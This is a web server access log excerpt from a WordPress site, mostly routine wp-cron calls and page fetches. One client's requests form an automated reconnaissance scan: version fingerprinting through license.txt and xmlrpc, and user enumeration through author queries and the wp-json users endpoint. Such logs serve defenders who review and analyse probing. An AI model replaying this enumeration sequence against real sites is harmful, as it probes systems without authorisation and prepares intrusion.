36.133.115.36 - - [15/Sep/2025:22:08:31 +0800] "POST /wp-cron.php?doing_wp_cron=1757945311.8706789016723632812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.38.44.221 - - [15/Sep/2025:22:08:32 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [15/Sep/2025:22:09:18 +0800] "POST /wp-cron.php?doing_wp_cron=1757945357.9836781024932861328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [15/Sep/2025:22:09:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.88.87.82 - - [15/Sep/2025:22:12:13 +0800] "OPTIONS / HTTP/1.0" 405 150 "-" "-"
36.133.115.36 - - [15/Sep/2025:22:16:11 +0800] "POST /wp-cron.php?doing_wp_cron=1757945771.3766510486602783203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [15/Sep/2025:22:16:11 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [15/Sep/2025:22:20:24 +0800] "POST /wp-cron.php?doing_wp_cron=1757946024.5953280925750732421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [15/Sep/2025:22:20:24 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
206.189.157.135 - - [15/Sep/2025:22:24:43 +0800] "GET / HTTP/1.1" 200 165874 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [15/Sep/2025:22:24:43 +0800] "GET /wp-includes/ID3/license.txt HTTP/1.1" 200 1396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
36.133.115.36 - - [15/Sep/2025:22:24:43 +0800] "POST /wp-cron.php?doing_wp_cron=1757946283.9340279102325439453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
206.189.157.135 - - [15/Sep/2025:22:24:44 +0800] "GET /feed/ HTTP/1.1" 200 82044 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [15/Sep/2025:22:24:44 +0800] "GET /xmlrpc.php?rsd HTTP/1.1" 200 700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [15/Sep/2025:22:24:45 +0800] "GET /?author=1 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
36.133.115.36 - - [15/Sep/2025:22:24:46 +0800] "POST /wp-cron.php?doing_wp_cron=1757946286.0572090148925781250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
206.189.157.135 - - [15/Sep/2025:22:24:46 +0800] "GET /?author=2 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
206.189.157.135 - - [15/Sep/2025:22:24:46 +0800] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
